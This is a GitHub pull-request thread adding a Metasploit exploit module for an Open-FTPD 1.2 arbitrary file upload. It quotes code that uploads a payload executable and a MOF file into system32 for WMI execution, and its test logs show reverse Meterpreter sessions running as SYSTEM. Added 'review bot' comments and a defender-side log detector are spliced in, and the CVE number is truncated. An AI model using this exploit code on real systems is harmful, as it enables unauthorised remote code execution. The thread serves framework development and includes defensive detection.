Add Open-FTPD 1.2 Writable Directory Traversal Execution #2211

Merged
merged 1 commit into from Aug 12, 2013


@bcoles
Contributor
bcoles commented Aug 12, 2013

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)


@jvazquez-r7
Contributor


@jvazquez-r7 jvazquez-r7 commented on the diff Aug 12, 2013
modules/exploits/windows/ftp/open_ftpd_wbem.rb
+ send_cmd(['TYPE', 'I'], true, conn)
+
+ # Prepare active mode: Get attacker's IP and source port
+ src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+ src_port = datastore['SRVPORT'].to_i
+
+ # Prepare active mode: Convert the IP and port for active mode
+ src_ip = src_ip.gsub(/\./, ',')
+ src_port = "#{src_port/256},#{src_port.remainder(256)}"
+
+ # Set to active mode
+ print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
+ send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
+
+ # Tell the FTP server to download our file
+ send_cmd(['STOR', filename], false, conn)
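Review bot: Rex::Socket.source_address is called without a destination in the src_ip line, so on a multi-homed host the address advertised in the PORT command may belong to the default-route interface rather than the one facing the FTP server; passing the target, as in Rex::Socket.source_address(rhost), selects the interface actually routed to it. The same line has no IPv4 guard, and src_ip.gsub(/\./, ',') produces a meaningless PORT argument for an IPv6 SRVHOST, so a fail_with when SRVHOST is not an IPv4 address would give users a clearer error than a silent data-connection timeout. Minor: the comment "# Tell the FTP server to download our file" describes STOR backwards; the server connects back to the data port given in PORT and stores what it receives, so "# Tell the FTP server to connect back and store our file" is more accurate.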
@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

According to the code, it looks like an arbitrary file upload rather than a directory traversal vulnerability, as written in the Name and Description of the module. Is that right, or am I forgetting something?

Thanks!

@bcoles
bcoles Aug 12, 2013 Contributor

You're correct. 'Arbitrary file upload' is more applicable.

@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

Awesome. In this case the fixes are just minor changes, so I'll make them myself and land it. Thanks @bcoles!

@jvazquez-r7 jvazquez-r7 commented on the diff Aug 12, 2013
modules/exploits/windows/ftp/open_ftpd_wbem.rb
+
+ # Largely stolen from freefloatftp_wbem.rb
+ def exploit
+ path = datastore['PATH']
+ exe_name = "#{path}/system32/#{rand_text_alpha(rand(10)+5)}.exe"
+ mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
+ @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
+ @exe = generate_payload_exe
+ @stage = :exe
+
+ begin
+ t = framework.threads.spawn("reqs", false) {
+ # Upload our malicious executable
+ u = upload(exe_name)
+ # Upload the mof file
+ upload(mof_name) if u
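Review bot: the return value of upload(mof_name) is discarded while upload(exe_name) is checked, so a failed .mof upload goes unreported and the module carries on waiting for a payload connection that will never arrive; a fail_with(Failure::Unknown, ...) (or at least a print_error) on either failed upload would make the failure visible to the operator. Also, since this path drops files under system32 and wbem\mof, it is worth confirming that both exe_name and mof_name are passed to register_file_for_cleanup right after their uploads succeed, so FileDropper at least attempts removal and reports what it could not delete. Minor wording: "# Largely stolen from freefloatftp_wbem.rb" reads better as "# Based on freefloatftp_wbem.rb".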

@jvazquez-r7 jvazquez-r7 commented on the diff Aug 12, 2013
modules/exploits/windows/ftp/open_ftpd_wbem.rb
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Ftp
+ include Msf::Exploit::Remote::TcpServer
+ include Msf::Exploit::EXE
+ include Msf::Exploit::WbemExec
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
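Review bot: with both Msf::Exploit::Remote::Ftp and Msf::Exploit::Remote::TcpServer mixed in, the module carries two sets of host options (RHOST/RPORT for the FTP control channel, SRVHOST/SRVPORT for the data listener the target connects back to), and nothing in the class header explains which is which; a sentence in the Description under update_info stating that transfers are done in active mode, so SRVHOST must be an address the target can reach, would save users a confusing timeout when the default SRVHOST of 0.0.0.0 resolves to the wrong interface.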
@jvazquez-r7
jvazquez-r7 Aug 12, 2013 Contributor

Please add the following option to the metadata:

'Stance'         => Msf::Exploit::Stance::Aggressive,

In this way the TcpServer will finish once the exploit finishes :). Even though you're using the TcpServer mixin here, it's an aggressive exploit, not a passive one.

@jvazquez-r7
Contributor

Once the comments are clarified by @bcoles, it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...
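As an added, defender-side example that is not part of this PR or of the Metasploit module: the run above shows an executable being written under system32 and a .mof file under wbem\mof through a traversal-permitting FTP server. The Ruby script below takes FTP server log lines, normalises the argument of each STOR command the way such a server would resolve it (both slash styles, with ".." popping a segment), and flags uploads that land under those Windows locations, separating a straight upload into a writable directory from one that escaped the FTP root. The log format and the sample lines are constructed for the example; the regular expression would need adapting to a real server's log layout.

```ruby
# Added example (not the module's code): flag FTP STOR commands whose target
# path, once '..' segments are resolved as a traversal-permitting server would
# resolve them, lands under a Windows location the PR's test run writes to.
# The log line format is constructed for this example.

# Sensitive directories, lower-cased, forward-slash form, relative to the
# drive root. Both system32 and its wbem\mof subdirectory are listed so that
# a hit under the narrower one is still reported with the most specific prefix.
SENSITIVE_DIRS = %w[windows/system32/wbem/mof windows/system32].freeze

# Resolve a client-supplied FTP path into a normalised, forward-slash path.
# '\' and '/' are both accepted as separators because Windows FTP servers
# commonly take either; '..' pops a segment, '.' and empty segments are dropped.
def normalize_ftp_path(raw)
  segments = []
  raw.gsub('\\', '/').split('/').each do |seg|
    case seg
    when '', '.'
      next
    when '..'
      segments.pop
    else
      segments << seg.downcase
    end
  end
  segments.join('/')
end

# True when the normalised path is inside one of the sensitive directories.
def sensitive_path?(norm)
  SENSITIVE_DIRS.any? { |d| norm.start_with?("#{d}/") }
end

# Constructed log layout: "<date> <time> <client-ip> <COMMAND> <argument>".
STOR_RE = /^(?<ts>\S+ \S+) (?<client>\S+) STOR (?<path>.+)$/

# Returns one {line:, path:, traversal:} hash per STOR whose destination
# resolves under a sensitive directory. `traversal` is true when the raw
# argument contained '..', i.e. the client escaped the directory it was in.
def suspicious_stores(log_lines)
  log_lines.each_with_object([]) do |line, hits|
    m = STOR_RE.match(line.strip) or next
    norm = normalize_ftp_path(m[:path])
    next unless sensitive_path?(norm)
    hits << { line: line.strip, path: norm, traversal: m[:path].include?('..') }
  end
end

# Constructed sample log lines (not real server output). File names mirror
# the ones in the PR's test run; the client address and paths are invented.
SAMPLE_LOG = [
  '2013-08-12 09:10:31 192.168.0.3 STOR ../../../Windows/system32/bexsGiK.exe',
  '2013-08-12 09:10:33 192.168.0.3 STOR ..\\..\\..\\Windows\\system32\\wbem\\mof\\BRhkiOcs.mof',
  '2013-08-12 09:10:35 10.0.0.7 STOR uploads/report.pdf',
  '2013-08-12 09:10:36 10.0.0.7 RETR uploads/report.pdf',
  '2013-08-12 09:10:40 10.0.0.9 STOR Windows/system32/drivers/etc/hosts',
].freeze

if __FILE__ == $PROGRAM_NAME
  suspicious_stores(SAMPLE_LOG).each do |h|
    kind = h[:traversal] ? 'TRAVERSAL' : 'UPLOAD'
    puts format('%-9s %s  <- %s', kind, h[:path], h[:line])
  end
end
```

Running the script on the sample input reports three hits: the two traversal uploads into system32 and wbem\mof, and one plain upload into system32 from a client whose FTP root already sat under the Windows directory. The third case is why the check keys on the resolved destination rather than on the presence of "..": a server whose writable root is inside the system directory is just as exposed without any traversal.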

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Aug 12, 2013
jvazquez-r7 Land #2211, @bcoles exploit for CVE-201-2620 b1fc830
@jvazquez-r7 jvazquez-r7 merged commit d63d7bc into rapid7:master Aug 12, 2013

1 check passed: default (The Travis CI build passed)
@jvazquez-r7
Contributor

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !
